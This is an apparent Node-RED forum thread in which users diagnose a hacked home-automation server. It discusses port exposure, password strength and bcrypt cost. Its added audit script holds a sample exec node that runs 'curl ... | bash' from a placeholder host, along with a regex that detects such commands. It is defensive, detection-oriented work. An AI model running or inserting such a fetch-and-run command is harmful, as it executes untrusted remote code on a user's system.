Nodered hacked by adding invisible nodes

LePotato device (Pi3 equivalent) running armbian 23.02

sudo and main user (the only one in fact)

No, password needed.

8 chars, letters upper and lower case + 2 special characters

Nope

1880

yes. I tried initially at set up to use another one on router 1 but I don't know why, there were some issues with the https certificate. So everything was routed 1880->1880->1880

A few months.

Thanks. Yes, I meant 1880. Slip of the brain. :smiley:

Obligatory xkcd about password length

9 Likes

Sorry, one more question: Was the Node-red editor password protected?

Yes, both nodered editor and dashboard were password protected.
Passwords were the same but different usernames.

Had you checked that http access did not work?

We have not seen any cases of hacking (as far as we are aware) that required a password.

As far as I know http was not enabled.

But for sure I might have made a mistake somewhere in the configuration. Like I said I'm not an expert and basically did the config reading papers on the net.

That's also why I thought about the discord node because the coincidence of the timing was surprising and to me a hack with https enabled was unlikely. So there is probably something else.

Actually, if using brute force password guessing, which apparently can be broken in a few days with a 10 char pwd, using https won't help.

I am changing all my passwords now. :grinning:

2 Likes

Still dubious if someone would go to that length to crack some password on an individual.

@iznogoud320 did you verify all (open) ports from the outside ? with grc or some other service ?

Can confirm that there is more than one hacker. If you see a flow labeled "SpiderPig420" or have nodes hidden in the bottom right corner of a flow with an exec node to pull a bash script then you have been compromised. I have seen this across dozens of unsecured node-red servers that can be found with a simple Google dork.

2 Likes
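One way to check an exported flows.json for the indicators mentioned above (the "SpiderPig420" tab label, exec nodes parked far off-canvas, and exec commands that pipe a download into a shell). This is an added example, not code from the thread or from Node-RED; the sample flow, the off-canvas threshold and the placeholder URL are constructed assumptions.

```javascript
// Added example: audit a Node-RED flows.json export for the indicators described
// in the thread. The flow array below is constructed for illustration only.
const SAMPLE_FLOWS = [
  { id: "tab1", type: "tab", label: "Home automation" },
  { id: "n1", type: "inject", z: "tab1", x: 120, y: 80 },
  { id: "n2", type: "exec", z: "tab1", x: 300, y: 80, command: "vcgencmd measure_temp" },
  { id: "tab2", type: "tab", label: "SpiderPig420" },
  { id: "n3", type: "exec", z: "tab1", x: 9800, y: 7600,
    command: "curl -s http://placeholder.invalid/payload.sh | bash" },
];

// Assumption: coordinates beyond this are well outside a normally used editor canvas,
// which is how a node ends up "hidden in the bottom right corner".
const OFFSCREEN_PX = 4000;
// A download tool whose output is piped straight into a shell.
const REMOTE_SHELL_RE = /\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b/i;

// Returns a list of { id, reason } findings; an empty list means nothing matched.
function auditFlows(flows) {
  const findings = [];
  for (const node of flows) {
    if (node.type === "tab" && /spiderpig/i.test(node.label || "")) {
      findings.push({ id: node.id, reason: "tab label matches a known-bad name" });
      continue;
    }
    if (node.type !== "exec") continue;
    if ((node.x ?? 0) > OFFSCREEN_PX || (node.y ?? 0) > OFFSCREEN_PX) {
      findings.push({ id: node.id, reason: "exec node placed off-canvas" });
    }
    if (REMOTE_SHELL_RE.test(node.command || "")) {
      findings.push({ id: node.id, reason: "exec command pipes a download into a shell" });
    }
  }
  return findings;
}

console.log(auditFlows(SAMPLE_FLOWS));
```

Run it against the real file with `JSON.parse(fs.readFileSync("flows.json"))` in place of the sample; a normal temperature-reading exec node produces no findings.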

Not surprising. They often work in groups - lone hackers are actually pretty rare. Sometimes they work at industrial scale, especially at the nation-state supported level.

Yes, and of course there are specialist tools that will discover these things anyway.


The price of success I'm afraid. Based on forum posts alone, I think we've seen a really big increase in numbers over the last year. So inevitable that hackers would eventually get wise even if at least one of them wasn't also into home automation!

Do you mean that a port could be open even if the router interface says it isn't?

I haven't tested from outside but the only ports officially routed were 1880 for nodered and 80 for certbot. And that was only tested from inside. I mean I connected to router 1 locally with my mobile and tested the open ports on router 2 with Net Analyzer on android.

There are plenty of port scanners - the grc.com site has one that can be trusted.

A badly configured router might expose various ports. That bad config might come from the router manufacturer or your ISP. Some routers for example exposed UPNP to the Internet which is easily hacked to open ports. Check for firmware updates and, if the routers are old and/or default ISP routers, consider whether they are still safe to use (do some internet searching, router vulnerabilities are generally well published over time). Also check that you aren't using default passwords on them.

Don't rely on a mobile device to do security scanning. There are too many other things going on that might interfere.

Hi Julian,
Could node-red-contrib-portscan be of any use for this? So that you run a scan from time to time and send a notification when unexpected ports open. I see that it is designed for LAN so not sure if it works to monitor a WAN port...
Of course you might say that it is not a good idea to run such a scan from Node-RED, because once Node-RED is compromised they can stop the scanning. However you can also say: if the scan has always been ok, then your hack won't be caused by an (incorrect) open port so it doesn't matter anymore if they stop the scan. Or am I mistaken somehow?

1 Like

I'm afraid not for router scans. Unless you are scanning someone else's router of course or running Node-RED on a cloud server so that you can scan your wan ports - but that is a bit of a circular issue!

What you could do would be to have a flow that uses one of the scan services from time-to-time. That would work. Or there are doubtless plenty of services out there that will do this kind of thing for you. If you are lucky enough to be part of the UK public sector, including the NHS, you can use the National Cyber Security Centre's fantastic services that periodically check defined endpoints for issues. :slight_smile:

2 Likes

If you were using a hashed password, did the hash begin with $2b$08? If you must expose anything with a password, then at least hash it with a higher cost. You could probably use 15 or higher on your setup, if you don't mind being slowed down ever so slightly when logging in. The built-in node-red admin hash-pw seems to only use 8 rounds, which is a little too low for modern hardware. Hashing the password yourself and using a higher cost won't stop the brute force, but it might slow the baddies and give you a little time to notice the attempt to gain access.

1 Like
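A way to check what the post above describes: read the cost factor out of the bcrypt strings in a settings.js adminAuth block and flag any below a chosen minimum. Added example, not the poster's or Node-RED's code; the users array and the hash bodies are constructed placeholders, and the minimum cost of 12 is an assumption.

```javascript
// Added example: bcrypt strings look like $2b$08$<22-char salt><31-char hash>.
// The two digits after the variant are the log2 work factor, so moving from the
// default cost 8 to cost 15 makes each guess 2^(15-8) = 128 times more expensive.
const BCRYPT_RE = /^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{53})$/;

// Returns { variant, cost } or null when the string is not a well-formed bcrypt hash.
function parseBcryptCost(hash) {
  const m = BCRYPT_RE.exec(String(hash));
  if (!m) return null;
  return { variant: m[1], cost: parseInt(m[2], 10) };
}

// Relative per-guess work when raising the cost from one value to another.
function slowdownFactor(fromCost, toCost) {
  return 2 ** (toCost - fromCost);
}

// Audit the users array that settings.js keeps under adminAuth.users.
function auditAdminAuth(adminAuth, minCost = 12) {
  const findings = [];
  for (const user of adminAuth.users || []) {
    const parsed = parseBcryptCost(user.password);
    if (!parsed) {
      findings.push({ username: user.username, reason: "password is not a bcrypt hash" });
    } else if (parsed.cost < minCost) {
      findings.push({ username: user.username,
                      reason: `cost ${parsed.cost} is below minimum ${minCost}` });
    }
  }
  return findings;
}

// Constructed sample: the hash bodies are dummy filler of the right length, not real hashes.
const DUMMY_BODY = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.";
const SAMPLE_ADMIN_AUTH = {
  type: "credentials",
  users: [
    { username: "admin",  password: "$2b$08$" + DUMMY_BODY, permissions: "*" },
    { username: "ops",    password: "$2b$15$" + DUMMY_BODY, permissions: "read" },
    { username: "legacy", password: "plaintext-secret",      permissions: "read" },
  ],
};

console.log(auditAdminAuth(SAMPLE_ADMIN_AUTH));
console.log("cost 8 -> 15 slowdown:", slowdownFactor(8, 15));
```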

Or better still, just don't use it at all and use a 3rd-party tool to secure access to the Editor properly. :slight_smile:

1 Like

Exactly this ... :smiley:

I don't know and I haven't kept a copy of nodered settings to check.
But yes, I did use the nodered tool to hash it.